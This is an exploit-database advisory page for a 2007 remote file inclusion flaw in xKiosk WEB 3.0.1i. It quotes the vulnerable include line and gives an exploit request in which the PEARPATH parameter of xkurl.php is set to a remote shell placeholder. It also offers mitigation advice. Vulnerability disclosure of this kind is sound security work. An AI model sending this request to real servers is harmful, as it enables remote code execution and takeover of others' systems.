header-logo
Suggest Exploit
vendor:
xKiosk WEB
by:
BorN To K!LL
N/A
CVSS
HIGH
Remote File Include
CWE
Product Name: xKiosk WEB
Affected Version From: 3.0.1i
Affected Version To: 3.0.1i
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

xKiosk WEB <= (PEARPATH) Remote File Include Vulnerability

The xKiosk WEB script version 3.0.1i is vulnerable to remote file inclusion. The vulnerability allows an attacker to include a remote file by manipulating the 'PEARPATH' parameter in the 'xkurl.php' script. This can lead to arbitrary code execution on the server.

Mitigation:

To mitigate this vulnerability, it is recommended to update the xKiosk WEB script to a patched version that addresses this issue. Additionally, ensure that the 'PEARPATH' parameter is properly validated and sanitized before including any files.
Source

Exploit-DB raw data:

xKiosk WEB <= (PEARPATH) Remote File Include Vulnerability

Script : xKiosk WEB

Version : 3.0.1i

Download : http://xkiosk.net/xkiosk.3.0.1j.web.zip

AUTHOR : BorN To K!LL

Vuln Code :

include($PEARPATH.'Client.php');

3xpl0!T :

[p4th]/system/funcs/xkurl.php?PEARPATH=[-SHell-]

Greetings 2 :

str0ke - Dr.2 - AsbMay's Group - GoLd_M - KuWaiT SeCuriTy ..

BorN To K!LL <> GoLd_M = 4ever ... =P

# milw0rm.com [2007-10-08]

Navigation

Suggest Exploit

Services By CQR